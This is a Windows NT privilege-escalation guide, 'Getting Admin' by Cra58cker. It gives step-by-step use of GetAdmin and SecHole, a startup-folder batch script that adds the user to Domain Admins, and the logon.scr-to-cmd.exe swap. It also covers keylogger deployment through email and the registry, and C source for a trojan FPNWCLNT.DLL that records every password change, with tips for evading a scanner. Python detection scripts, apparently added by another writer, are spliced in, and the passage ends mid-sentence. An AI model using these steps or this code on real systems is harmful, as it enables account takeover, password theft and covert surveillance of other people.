
Getting Admin

by Cra58cker



DISCLAIMER: I, CRA58CKER, PUT THIS GUIDE TOGETHER. THIS GUIDE GOES OVER THE MAIN ATTACK METHODS A HACKER OR A PISSED OFF EMPLOYEE WOULD USE TO "0wN" THE NETWORK IF THEY HAVE PHYSICAL ACCESS TO THE MACHINE. THESE EXPLOITS HAVE BEEN TAKEN FROM ALL OVER THE WEB (SO THEY WORK ON VARIOUS PLATFORMS OF WINDOWS NT) AND IF YOUR EXPLOIT(S) IS ON HERE YOU SHOULD GET CREDIT AT THE END OF THE FILE. IF YOU DON'T, EMAIL ME!!! IN THIS TEXT FILE I HAVE WRITTEN TWO EXPLOITS (IF YOU CAN REALLY CALL THESE EXPLOITS); THE REST WAS TAKEN FROM THE WEB, BOOKS, NEWSLETTERS AND THE IRC CHANNEL #HACK. FEEL FREE TO SHARE THIS GUIDE AROUND! BUT! IT MUST REMAIN UNCHANGED AND MY NAME MUST REMAIN WHERE IT IS. IF YOU PRETEND YOU WROTE THIS GUIDE THEN YOU ARE A LAMER! AND NEED TO GET A LIFE!

IN THE FUTURE I WOULD LIKE TO SEE THIS GUIDE FLOATING ABOUT ON ALL HACKING\CRACKING\SECURITY\SCRIPT KIDDIE WEBSITES. AND NOW THE BORING DISCLAIMER:

"I AM NOT TO BE HELD RESPONSIBLE FOR YOUR ACTIONS AFTER READING THIS GUIDE, WHETHER IT BE WORLD WAR, SUSPENSION FROM SCHOOL, DEATH, VIOLENCE, GETTING SUED ETC. BLABLBALBLABLBLAB. BASICALLY THE LINE IS THIS:

I'VE TOLD YOU HOW TO HACK A WINDOWS NT BOX THAT YOU HAVE PHYSICAL ACCESS TO BUT I NEVER SAID DO IT! I JUST TOLD YOU HOW...


Welcome to the second paper of "The White Paper Series"; the first paper was entitled "Cracking SAM" and you can pick it up in the tutorial section at www.astalavista.com. If you don't know already, the White Paper Series is a collection of papers all about Hacking\Protecting Windows NT....

In this paper I plan to go through a few methods that Hackers (Including me!) use to get Administration Privileges on a Windows NT workstation when they have physical access to the machine.

If you want to know "How do I hack a Windows NT box from the internet?" then you are going to have to wait, I'm afraid until the next text file comes out :), ok enough talk on with the show...

PURPOSE

This guide is written for the average Hacker, Cracker and System Administrator. I wrote this guide so Administrators (and Hackers) have a good understanding of the security on a Windows NT box. This guide was not written for Good nor Evil; it was written purely for people to develop their knowledge of a Windows NT box further, so as I said, if you abuse this knowledge and end up going to court don't bring my name into it. I told you how to do it but I never said do it...

If you are more interested in actually hacking into an NT box remotely then you will have to wait until the guide entitled "The Ultimate Hackers Handbook to Hacking Windows NT" comes out. I hope you learn something from reading this text file even if you are a Linux\Unix fan. I know there are probably spelling mistakes and bad use of grammar in this guide but I don't really care, providing it's readable; who really cares?

NOTE: THE BOX YOU ARE PENETRATING IS A WINDOWS NT WORKSTATION 4.0, BUT THIS REALLY DOESN'T MATTER; IT ALL DEPENDS ON HOW UP TO DATE THEIR PATCHES ARE (YOU WILL SEE WHAT I MEAN WHEN YOU READ ON).

Starting Point

So what would make an excellent penetration attempt? Getting your hands on a copy of the SAM (Security Account Manager) and then running the latest version of L0phtCrack against it. So firstly you would look in the WINNT\REPAIR and if there is a copy of SAM, copy it to a formatted floppy disk and leg it out the building, then when you get home load it into your home version of L0phtcrack feed in a bunch of wordlists and dictionary files, turn on the TV watch an episode of Buffy The Vampire Slayer and once that is finished check L0phtCrack and you would have uncovered about 60 odd passwords including the Admins! Hurray mission accomplished, easy, hey?

But what if a copy of the SAM isn't there? Well, it looks like you're going to have to get Admin privileges, and this is what the guide is here for...

EXPLOIT 1 - GETADMIN.EXE

Ok, now before I explain to you what "GetAdmin" actually is, I think I had better just tell you that this exploit was programmed\written in 1997. At the time of writing this the year is 2003, so if this exploit actually works on your system you should really look for updates, because you need them. Anyway, on with the exploit.

A very clever person called Konstantin Sobolev wrote the program, so all credit goes to him. Since this is his program it's best that he explains how it works...

"This program can get administrator rights without any special privileges. Simply run GetAdmin or GetAdmin account_name from the command line. If you do not enter account_name, the current account will be used.

The bug is in the subfunction of NtAddAtom, which does not check an output address. So it's possible to write into kernel memory. Of course it's not necessary to inject a DLL into winlogon to get admin rights. You can simply replace some part of ntoskernel or replace the process token, etc. If you'd like to get the full source code, please click here.

Preventing the Attack

Only one real way: patch ntoskernel and replace function NtAddAtom so it checks for valid address.

You can remove all access from ntoskernel but it's possible to take into account the fixed address of the NtGlobalFlag in the GetAdmin program. So other ways to get administrator rights exist if you can write to the kernel memory."

Now if you didn't really take any of that in, here is a STEP-BY-STEP guide to executing the program... NOTE: IT DOESN'T WORK ON ALL VERSIONS OF NT!

STEP 1

The file is in Zip format, so unzip it with an unzipping utility such as WinZip...

STEP 2

Extract the files to any directory to which you have read and write access.

STEP 3

Locate the directory to where you unzipped the files and check that you have the following files...

GetAdmin.exe - The file you will be executing

GASYS.DLL - The file, which injects itself into GetAdmin.exe

STEP 4

Load up Cmd.exe (The DOS B0x)

STEP 5

Change to the directory where the two files are located

STEP 6

Execute the GetAdmin.exe by typing Getadmin.exe Account_Name

E.g. If I was logged in as Michelle Trachtenberg I would type...

GetAdmin.exe Michelle Trachtenberg

You should then get a message which says something like "Congratulations, Michelle Trachtenberg has Admin rights!" If this happens, log out then log in as Michelle Trachtenberg (or whatever account you were in). If this doesn't happen, go to step 7.

STEP 7

Wait....

The screen will freeze for a while and perhaps may even crash! So reboot the machine and log in as Michelle Trachtenberg (Or whatever your account name is)

STEP 8

Bingo! You should have Admin rights! You can do anything you want! I advise you to download L0phtCrack and some wordlists and launch them against the remote machine. Then hide the application and get on with some work!

An hour later you should have recovered about 30 - 50 passwords (it all depends on how strong the passwords are and where you downloaded the dictionary files from).

Now for all you really clever people and top notch programmers here is some of the source code to the program GetAdmin.exe....

How it works?

Here is the main string that has done all in GetAdmin:

ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can open any process in the system, because the function NtOpenProcess does not check for SE_DEBUG_PRIVILEGE when the bit in NtGlobalFlag+2 is set. Afterwards, the program injects a DLL into the winlogon process. Winlogon is running under the SYSTEM account so it can add / remove a user in the Administrators group.

Function ChangeNtGlobalFlag:

    BOOL ChangeNtGlobalFlag(DWORD NtGlobalFlag)
    {
        DWORD callnumber = 0x3;   // NtAddAtom
        DWORD stack[32];
        int   i;
        DWORD handle = 0;
        CHAR  string[255];

        if (!pNtGlobalFlag) return 0;

        stack[0] = (DWORD)string;
        stack[1] = (DWORD)&handle;   // pNtGlobalFlag;

        for (i = 0; i < 0x100; i++) {
            sprintf(string, "NT now cracking... pass %d", i);

            if (handle & 0xf00) {
                stack[1] = (DWORD)pNtGlobalFlag + 1;
            }

            __asm {
                mov eax, callnumber;
                mov edx, stack;
                lea edx, dword ptr [stack];
                int 0x2e;
            }

            if (stack[1] == pNtGlobalFlag + 1) break;
        }

        return TRUE;
    }

That's actually pretty complex, but if you understand all the source code fair play! But you should all have a rough understanding on how to execute the GetAdmin.exe, and you should have a good understanding of how it works.

If you are an Admin and this Exploit worked then go to www.microsoft.com and look for a GetAdminFix.exe or go to a search engine and type in "Download patch for GetAdmin.exe"

If the exploit didn't work you either...

  1. Have a patch for it already (well done), or
  2. Are running a version of Windows the GetAdmin exploit isn't compatible with.

Ok on with the next Exploit...


HACKERS TIP: IF THE EXPLOIT DIDN'T WORK TRY DOWNLOADING A PROGRAM CALLED CRASH.EXE, RUN THIS PROGRAM FIRST THEN RUN GETADMIN, YOU SHOULD BE THEN ADDED TO THE ADMIN GROUP....


EXPLOIT 2 - SECHOLE.EXE

Ok, again this one is fairly old, but it came out after getadmin.exe, so if getadmin.exe didn't work for you this one should. Ok, this sechole.exe is basically another admin attack, and this is how it works; this was taken from the readme file of sechole.zip...

Another GetAdmin attack -- Lets any user become admin user instantly!!

Attached are the README file, executable and the DLL which demonstrate The NT Security hole.

Steps to follow: You need to have a machine running Windows NT 4.0 or 5.0beta, either workstation or server will do.

  1. Login as any non-admin user on the machine (even guest account will do). (You may verify that the logged in user does not possess admin privilege at this time by trying to run the "windisk" program from the shell. This should fail since the user does not have admin privilege).
  2. Copy the attached files: SECHOLE.EXE and ADMINDLL.DLL onto your hard disk in any directory, while logged in as the above non-admin user.
  3. Run SECHOLE.EXE. After this your system might become unstable or even hang. The damage is already done by this time. Simply reboot the machine. You will see that the non-admin user now belongs to the administrator group. This means that the user has complete admin control over that machine. Now you will be able to run programs like "windisk". Another way to verify newly acquired admin privileges is to run the "User Manager" from the "Administrative Tools".

In my opinion this bug is very difficult to fix. I plan to write about it in our upcoming book "Undocumented Windows NT" which is yet to be published and talks about a host of undocumented calls that Microsoft uses. Something every serious programmer must have.

Right, there is nothing else really to say about that exploit; it's quite simple to understand and execute, so I'll let you work the rest out.


EXPLOIT 3 - BATCH HACKING

One day I was just messing about with the BATCH language and I found an exploit that could actually help you get Admin access. Now when you see this exploit you may think "That's pretty old and was discovered ages ago", BUT I wrote this in the space of 10 minutes and it worked like a charm :) First I will give you the actual source code for the BATCH script, then I will write out simple steps on how to use it.... To pull off this hack simply log in as guest.

COPY HERE

    @echo off
    rem %user% must hold the account name; cmd expands it to nothing if it is not set
    net user %user% pass /active:yes /domain /add
    net localgroup Administrators %user% /add
    net group "Domain Admins" %user% /add /domain
    net group "Guests" %user% /delete /domain

STEP-BY-STEP GUIDE TO USING THE "HACKING BATCH SCRIPT"

STEP 1

Open up notepad

STEP 2

Copy and paste the above script into the notepad

STEP 3

Then choose "Save As" and save it as XXXXX.BAT (XXXXX being whatever you want to call it), and save it to the following directory....

WINNT\Profiles\All users\Start Menu\Programs\Start-up Folder

Bingo! At the next Administration Login, the user would gain privileged access to the system and the domain.

NOTE: IF YOUR ADMIN IS A PRO THEN HE\SHE WOULD HAVE DISABLED CERTAIN NET COMMANDS AND MAY EVEN BLOCK ACCESS TO THE STARTUP FOLDER! BUT THIS SCRIPT IS WORTH A SHOT :)
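From the admin's side, the startup-folder script above is easy to spot before it ever runs. Here is an added example of my own (not part of Cra58cker's guide) that scans a startup folder for scripts of this kind: it tokenizes each line the way cmd.exe sees it and reports any net command that creates an account or changes group membership. The folder path is assumed from the guide's default NT 4.0 layout; the sample script is constructed.

```python
import re
from pathlib import Path

# All Users startup folder as given in the guide (assumption: default NT 4.0 install).
STARTUP_DIR = Path(r"C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup")

# Groups whose membership changes should always be treated as privilege changes.
PRIVILEGED_GROUPS = {"administrators", "domain admins", "enterprise admins",
                     "schema admins", "account operators", "backup operators"}

# Constructed sample: the guide's script with an account name written in,
# plus a harmless "net use" line to show what is NOT flagged.
SAMPLE_SCRIPT = r"""@echo off
rem constructed sample, not a real startup script
net user someuser pass /active:yes /domain /add
NET.EXE LOCALGROUP "Administrators" someuser /ADD
net group "Domain Admins" someuser /add /domain
net group "Guests" someuser /delete /domain
net use z: \\server\share
"""


def tokenize(line):
    """Split a cmd.exe line into lower-cased tokens, keeping "quoted args" whole."""
    return [(q or w).lower() for q, w in re.findall(r'"([^"]*)"|(\S+)', line)]


def classify(line):
    """Return a reason string if the line creates an account or edits a group,
    otherwise None. Handles net/net.exe, mixed case and the /domain switch."""
    toks = tokenize(line.strip().lstrip("@"))
    if len(toks) < 3:
        return None
    cmd = toks[0][:-4] if toks[0].endswith(".exe") else toks[0]
    if cmd != "net":
        return None
    sub, target = toks[1], toks[2]
    flags = {t for t in toks[3:] if t.startswith("/")}
    if sub == "user" and "/add" in flags:
        return "creates account %r" % target
    if sub in ("localgroup", "group") and len(toks) > 3:
        member = toks[3]
        if "/add" in flags:
            level = "privileged " if target in PRIVILEGED_GROUPS else ""
            return "adds %r to %sgroup %r" % (member, level, target)
        if "/delete" in flags:
            return "removes %r from group %r" % (member, target)
    return None


def scan_script(text):
    """Return [(line_no, line, reason)] for every suspicious line in a script."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        reason = classify(line)
        if reason:
            hits.append((n, line.strip(), reason))
    return hits


def scan_startup_folder(folder=STARTUP_DIR):
    """Scan every .bat/.cmd in the folder; returns {path: hits} for files with hits."""
    results = {}
    if not folder.is_dir():
        return results
    for p in folder.iterdir():
        if p.suffix.lower() in (".bat", ".cmd"):
            hits = scan_script(p.read_text(errors="replace"))
            if hits:
                results[str(p)] = hits
    return results


if __name__ == "__main__":
    for n, line, reason in scan_script(SAMPLE_SCRIPT):
        print("line %d: %s  <- %s" % (n, reason, line))
    for path, hits in scan_startup_folder().items():
        print(path, hits)
```

The same check belongs on every per-user Startup folder and on the Run registry keys, since the guide's own note says a careful admin locks the All Users folder down.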


EXPLOIT 4 - REPLACING LOGON

I was browsing the underground and I came across a simple text file written by... well, I didn't get his name, he didn't leave it, but if he is reading this now, email me and I can give you the proper credit you deserve, ok? The text file I discovered gives a rather simple way of getting ADMIN! privileges. Here is how you do it.

If you can log in as an account, drop to DOS start -> run -> cmd, at the C: prompt type the following (assuming default install locations)

C:\> cd \winnt\system32 
C:\winnt\system32> copy logon.scr logon.scr.old 
C:\winnt\system32> del logon.scr 
C:\winnt\system32> copy cmd.exe logon.scr 

Now log off the machine. logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up; then just use net user administrator at the C:\> prompt to set a new password, and log in with it.

Try this, might work, and as long as he\she didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.

Heh, there you have it another, very easy way to get Admin! BUT remember once you have changed the password to the administrators account make sure you sort out the screen saver mess and change it back to how it was, or otherwise it's going to happen to you! Yeah, I know it's a vicious circle!


HACKERS TIP: IF YOU DON'T WANNA RISK LOGGING IN AS ADMIN AND CHANGING THE PASSWORD, WELL, SINCE YOU HAVE A DOS BOX WITH FULL SYSTEM RIGHTS, SIMPLY RUN THE "RDISK" COMMAND AND CREATE AN EMERGENCY DISK ON A:\. THE EMERGENCY DISK WILL CONTAIN ALL THE IMPORTANT FILES WINDOWS NT NEEDS TO LOAD, INCLUDING THE SAM! BUT THERE IS A CATCH: THE SAM WILL ONLY HAVE ADMIN AND GUEST! SOMETIMES IT ONLY HAS GUEST, SO BE CAREFUL :(
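The logon.scr swap above is simple to catch from the admin's side. Here is an added example of my own (not from the guide or its anonymous source): a real screen saver is linked as a GUI-subsystem PE, while cmd.exe is a console-subsystem PE, so reading logon.scr's PE Subsystem field, together with comparing its hash to cmd.exe, flags the replacement. The fake_pe helper builds constructed header-only images for the test; audit_files assumes the default C:\WINNT\system32 path used in the text.

```python
import hashlib
import struct

IMAGE_SUBSYSTEM_WINDOWS_GUI = 2   # what a genuine screen saver is linked as
IMAGE_SUBSYSTEM_WINDOWS_CUI = 3   # what cmd.exe is linked as


def pe_subsystem(data):
    """Return the Subsystem field of a PE image; raise ValueError if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                   # skip signature and 20-byte COFF header
    if len(data) < opt + 70:
        raise ValueError("truncated optional header")
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):           # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    # Subsystem sits at offset 68 of the optional header in both PE32 and PE32+.
    return struct.unpack_from("<H", data, opt + 68)[0]


def check_logon_screensaver(scr_bytes, cmd_bytes):
    """Return a list of findings; an empty list means logon.scr looks legitimate."""
    findings = []
    if hashlib.sha256(scr_bytes).digest() == hashlib.sha256(cmd_bytes).digest():
        findings.append("logon.scr is byte-identical to cmd.exe")
    try:
        sub = pe_subsystem(scr_bytes)
    except ValueError as exc:
        findings.append("logon.scr is not a valid PE: %s" % exc)
    else:
        if sub != IMAGE_SUBSYSTEM_WINDOWS_GUI:
            findings.append("logon.scr subsystem is %d, expected GUI (2)" % sub)
    return findings


def fake_pe(subsystem, tail):
    """Constructed minimal MZ/PE header for testing (not a runnable binary)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<H", opt, 68, subsystem)
    return dos + coff + bytes(opt) + tail


def audit_files(system32=r"C:\WINNT\system32"):
    """Run the check against the real files on a Windows host (path is an assumption)."""
    import os
    with open(os.path.join(system32, "logon.scr"), "rb") as f:
        scr = f.read()
    with open(os.path.join(system32, "cmd.exe"), "rb") as f:
        cmd = f.read()
    return check_logon_screensaver(scr, cmd)


if __name__ == "__main__":
    cmd = fake_pe(IMAGE_SUBSYSTEM_WINDOWS_CUI, b"cmd")
    scr = fake_pe(IMAGE_SUBSYSTEM_WINDOWS_GUI, b"scr")
    print("untouched:", check_logon_screensaver(scr, cmd))
    print("swapped:  ", check_logon_screensaver(cmd, cmd))
```

A hash against a known-good logon.scr is the stronger check; the subsystem test only catches a console program dropped in its place.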


EXPLOIT 5 - KEY LOGGING

I was actually wondering if I should include this hacker technique and NT exploit because it is a tad lame! And I don't really know if it fits in as getting Admin, but anyway I suppose I had better explain how this one works... You all know what a key logger is, right? Well, it's a piece of software which gets stored on the victim's computer and logs all keystrokes to a "hidden" file, and sometimes it's password protected so only the person who installed the key logger can view\add\edit\uninstall it. There are two main types of key loggers: hardware key loggers and software key loggers.

HARDWARE KEYLOGGERS - A hardware key logger is a piece of equipment which gets plugged into the back of the PC and then gets linked up with another PC, and whatever gets typed on the first PC shows up on the other PC; it's kind of obvious when you think about it. Here is another example of a hardware key logger: imagine a normal keyboard, the usual type, the one which you plug into the back of your PC. Well, there are "special" keyboards which look identical to a normal keyboard, only they log ALL keys that are pressed and store them in a file which the attacker or concerned parents specify. Some hardware key loggers come with software and others don't. Well, this file isn't about key loggers, so just look around yourself, and be careful, you could be being logged right now... :)

SOFTWARE KEYLOGGERS - Yeah, you guessed it, a software key logger is a program which, as I said above, gets installed secretly on the PC, and then all keys are logged to a hidden file, and the file is password protected, so if you discover it and try to delete it you will be prompted with a password box. To be honest it is actually quite scary because key loggers are now pretty advanced and contain advanced features such as...

  1. LOG all Yahoo! MSN, AIM conversations.
  2. LOG all screenshots
  3. LOG all websites visited
  4. LOG all applications run
  5. LOG all passwords.

And what is even more scary is that some key loggers contain "remote logging", which means that an attacker can bind the key logger with another exe file(s) and send it via email; all keys are then sent to the attacker's PC over email.

Well, I went to www.google.com and had a very quick look at Windows NT loggers, and let me tell you there are loads! So browse around and see what you can find; however, I do recommend looking for one called "Blazing Tools Perfect Keylogger", since it has a lot of advanced features and can be installed remotely, which means that you can combine the key logger with an exe file (as I have mentioned above) and when the victim runs the exe file the key logger is stealthily installed on their PC (you send it via email). Then all the key log information goes to your email account in the form of *.log files. This is pretty cool; you can also set the key logger to start at the very beginning of boot-up, therefore you can catch network passwords including the Admin's!!!

Anyway, as I said, it is a bit lame and it's not guaranteed to work 100%, but I'm sure if you send one to the [email protected] you could come across quite a lot of interesting things such as MSN passwords, Yahoo account information etc. BUT this is script kiddie behaviour! BUT then again it could get the job done pretty quickly...

Anyway to finish this section I'll tell you about "Blazing Tools Perfect Key logger" features...

  • Can be absolutely invisible
  • Visual surveillance (screenshots)
  • Logging texts typed in every application
  • Websites logging
  • Clipboard logging
  • Sending log and screenshots by e-mail in the hidden mode
  • Stealth uploading logs by FTP
  • Remote installation
  • Log file is encrypted and can be protected with a password
  • Monitoring all users of the PC, even if you don't know their passwords
  • Easy log viewing and management
  • Export log to HTML format
  • Possibility to specify target applications
  • Supports all Windows versions, including Windows XP
  • Very easy to use
  • Low price

If you manage to get Admin you may want to take the key logger one step further by stealing everyone else's password. You can do this in the following steps...

  1. Install and configure the key logger on the administrator's PC.
  2. Copy the key logger's folder contents (by default Program Files\BPK) to any folder on the remote computer.
  3. Click Start > Run and type regedt32.
  4. Choose the File > Connect to computer command (this command may be named differently in different versions of Windows).
  5. Connect to the PC you have chosen and open the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run registry branch.
  6. Add a REG_SZ entry with any name and value = full path to bpk.exe (the key logger's executable).
  7. On the next Windows start-up the key logger will start its work.

Ok, for all you network security experts and 1337 (elites) shouting at the screen now "LAME exploit! Can easily be avoided", let's just ignore the key logger and move on...


EXPLOIT 6 - RDISK

Ok, I'm going to be honest this worked once for me and that’s it! So don't be surprised if this doesn't work at all.

Anyway, we all know the DOS command "RDISK". Basically, if you read the Hackers Tip above you'll realise that when you run this command it produces an Emergency boot disk. Now let me explain: on this disk all the important main start-up files are copied, including the SAM. However, the only accounts on there will be Guest and Administrators (possibly).... So follow these steps to pull off this hack...

STEP 1

Login as anyone who has access to the cmd.exe

STEP 2

Run the DOS B0x and then type the command "RDISK" (make sure you are in the Winnt directory.)

STEP 3

Pop in a floppy disk when it tells you (you will get a warning that the floppy disk will be formatted; simply click OK).

STEP 4

Sit back and relax and let it copy all the main files to the disk.

STEP 5

Nick the disk! And when you get home import the SAM file from the disk and run L0phtcrack against it... AND HOPEFULLY THE ADMIN ACCOUNT WILL BE ON THERE BUT NO! PROMISES!

NOTE TO ADMINS: YOU CAN AVOID THIS BY DISABLING THE RDISK COMMAND


EXPLOIT 7 - MY FRIEND PETER

THIS EXPLOIT WAS TAKEN FROM "The Unofficial NT Hack FAQ"

And this is pretty advanced, so if you are new to Windows NT security\hacking I would give this exploit a miss and come back to it later...

Use the Offline NT Password Editor by Petter Nordahl-Hagen. You need to download Petter's code to your Linux machine (you DO have one of those, don't you?) and compile it using a libDES and MD4 library. Now mount the NT drive read/write and follow the instructions in the readme. The instructions are pretty easy to follow, especially if you know enough to get to the point to use them ;-)

Actually, to make things easier, Petter has built a bootdisk image that steps you through the entire thing. I'll be the first to admit that Petter's code is as dangerous as hell, but it does work and I had no problems. YMMV.

Consider using GetAdmin.exe (section 04-5) and go from there if you are too paranoid or fearful of booting up Linux to get to an NT machine.


EXPLOIT 8 - %SYSTEMROOT%\SYSTEM32 BEING WRITABLE

Again, this exploit was taken from "The Unofficial NT Hack FAQ" by Simple Nomad, and I found this exploit quite successful when trying to steal network passwords. The only downside to this is that good AV (Anti-Virus) will pick this exploit up quite quickly if you don't compile it very well, but nevertheless you might as well have a shot...

Well, this can be exploited on NT 4.0 by placing a trojaned FPNWCLNT.DLL in that directory. This file typically exists in a Netware environment. First compile this exploit code written by Jeremy Allison ([email protected]) and call the resulting file FPNWCLNT.DLL. Now wait for the user names and passwords to get written to a file in \temp.

------------- Cut --------------

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>

    struct UNI_STRING {
        USHORT len;
        USHORT maxlen;
        WCHAR *buff;
    };

    static HANDLE fh;

    BOOLEAN __stdcall InitializeChangeNotify()
    {
        DWORD wrote;
        fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE,
                        FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS,
                        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_WRITE_THROUGH, 0);
        WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
        return TRUE;
    }

    LONG __stdcall PasswordChangeNotify(struct UNI_STRING *user, ULONG rid,
                                        struct UNI_STRING *passwd)
    {
        DWORD wrote;
        WCHAR wbuf[200];
        char  buf[512];
        char  buf1[200];
        DWORD len;

        memcpy(wbuf, user->buff, user->len);
        len = user->len / sizeof(WCHAR);
        wbuf[len] = 0;
        wcstombs(buf1, wbuf, 199);
        sprintf(buf, "User = %s : ", buf1);
        WriteFile(fh, buf, strlen(buf), &wrote, 0);

        memcpy(wbuf, passwd->buff, passwd->len);
        len = passwd->len / sizeof(WCHAR);
        wbuf[len] = 0;
        wcstombs(buf1, wbuf, 199);
        sprintf(buf, "Password = %s : ", buf1);
        WriteFile(fh, buf, strlen(buf), &wrote, 0);

        sprintf(buf, "RID = %x\n", rid);
        WriteFile(fh, buf, strlen(buf), &wrote, 0);

        return 0L;
    }

------------- cut --------------

If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to reboot the server after placing the trojan in %systemroot%\system32.

ISS (www.iss.net) has a security scanner for NT which will detect the Trojan DLL, so you may wish to consider adding in extra junk to the above code to make the size of the compiled DLL match what the original was. This will prevent the current shipping version of ISS's NT scanner from picking up the Trojan.

It should be noted that by default the group Everyone has default permissions of "Change" in %systemroot%\system32, so any DLL that is not in use by the system could be replaced with a Trojan DLL that does something else.
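An added example from the admin's side (mine, not from the FAQ or Jeremy Allison's code): LSA loads the DLLs named in the REG_MULTI_SZ value Notification Packages under HKLM\SYSTEM\CurrentControlSet\Control\Lsa, which is how a file called FPNWCLNT.DLL placed in system32 gets loaded at all. The FAQ's own point is that a size-only check is defeated by padding, so this audit compares SHA-256 hashes against an allowlist instead, and also reports listed packages whose DLL is absent. The registry bytes and DLL contents are constructed sample data; the allowlist must hold your own known-good hashes.

```python
import hashlib
import os

LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
LSA_VALUE = "Notification Packages"

OK, MISSING, UNKNOWN, MISMATCH = "ok", "missing", "unknown", "mismatch"

# Constructed sample data: a raw REG_MULTI_SZ as NT 4.0 ships it, a stand-in
# for the legitimate DLL, and a different image of the same name padded to
# the same size (the padding trick the FAQ describes).
SAMPLE_VALUE = "FPNWCLNT\0\0".encode("utf-16-le")
GOOD_DLL = b"MZ constructed stand-in for the legitimate fpnwclnt.dll image"
OTHER_DLL = b"MZ constructed stand-in for a replaced image".ljust(len(GOOD_DLL), b"\0")
ALLOWLIST = {"fpnwclnt": hashlib.sha256(GOOD_DLL).hexdigest()}   # your known-good hashes


def parse_multi_sz(raw):
    """Decode a REG_MULTI_SZ blob: UTF-16LE strings, NUL separated, double NUL end."""
    return [s for s in raw.decode("utf-16-le").split("\0") if s]


def audit_packages(names, read_dll, allowlist):
    """Check every listed package. read_dll(name) returns the DLL bytes or None.
    Returns [(name, status)] with status one of OK, MISSING, UNKNOWN, MISMATCH."""
    report = []
    for name in names:
        data = read_dll(name)
        if data is None:
            report.append((name, MISSING))      # dangling entry: remove it from the value
            continue
        expected = allowlist.get(name.lower())
        if expected is None:
            report.append((name, UNKNOWN))      # nothing known-good to compare against
        elif hashlib.sha256(data).hexdigest() != expected:
            report.append((name, MISMATCH))     # size may match; the hash does not
        else:
            report.append((name, OK))
    return report


def read_from_system32(name):
    """read_dll for a live host: <SystemRoot>/system32/<name>.dll, or None if absent."""
    root = os.environ.get("SystemRoot", r"C:\WINNT")
    path = os.path.join(root, "system32", name + ".dll")
    if not os.path.isfile(path):
        return None
    with open(path, "rb") as f:
        return f.read()


def registry_packages():
    """Read the live value through winreg on Windows; returns [] elsewhere."""
    try:
        import winreg
    except ImportError:
        return []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, LSA_KEY) as key:
        value, _ = winreg.QueryValueEx(key, LSA_VALUE)   # REG_MULTI_SZ -> list of str
    return list(value)


if __name__ == "__main__":
    names = registry_packages() or parse_multi_sz(SAMPLE_VALUE)
    for name, status in audit_packages(names, read_from_system32, ALLOWLIST):
        print("%-12s %s" % (name, status))
```

Pairing this with a fix for the Everyone:Change permission on system32 removes both halves of the attack: the write, and the loader entry that rewards it.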


EXPLOIT 9 - ACCESS CONTROL LIST AB(USE) BY ME!

In every Windows NT box there are files, directories and an ACL (Access Control List). Each user and group has a SID (Security Identifier), and when a user attempts to read or write to a file the access is checked against a list of access-control entries inside the ACL. So the Guest account, for example, won't be allowed to do as many things as the Administrator (obviously) because of the ACL. Here is a list of the flags controlling ACLs for files and directories....

FLAG                          DESCRIPTION
------                        -------------
N                             No access
R                             Read
W                             Write
X                             Execute
D                             Delete
P                             Change permission
O                             Ownership
An                            All
RX                            Directory File/Scan
WX                            Directory

So how does this bit of knowledge help you get Admin? Well, think about it: you are limited to doing a certain number of things because of your ACL and SID, so if you could perhaps edit your SID your ACL would be altered. Confused? Well, don't worry, because I will take you through the steps of the methods that have worked for me (Note: I am writing this from personal experience, so don't blame me if whatever I say turns out totally different!)

To pull off this hack I suggest you get the following tool(s) (if you don't have access to them already). These are the tools I used to "unset my flags" and to modify the access control entries inside the ACL.

GRANT

REVOKE

SETOWNER - This is the tool I use the most because it gets the job done nicely :)

Once you have downloaded these tools, note the directory where you have saved them. Now open up a DOS B0x and change to the directory where they are located. I suggest you first run SETOWNER.EXE (if you can work this one you can mainly work all of them). Ok, now once this is done you'll get something like........

Setowner 1.1 something, something, copyright Arne Vidstrom. So straight away you can see that there aren't that many options, so this program is quite simple to use; just remember one key thing.......

Setowner [Domain\Account]

So lets do some examples, say for instance we wanted to find out who owned the file Diary.txt we would simply type.........

Setowner PATH OF FILE! e.g. C:\files\file.txt

and then you would get something like.........

The File owner is: OWNER OF FILE E.G

The File owner is: Michelle Trachtenberg

Pretty simple huh? Basically all we have done is selected a file and found out who owns it. Now lets move on to more actual Hacking (Well, sort of)

Say for instance that one of the "Employees" (Including the Administrator) has a file that you want and you know the Hardcore path a simple command with the Setowner can easily make you 0wn the file the command is this...

Setowner HARDCORE PATH OWNER e.g.

Setowner C:\Files\Diary.txt Michelle Trachtenberg

What would happen is that Michelle Trachtenberg would be the 0wner of "C:\Files\Diary.txt", understand? It's really simple; here the Setowner program even includes examples so you should have no trouble using it.

So there you have it another way to...

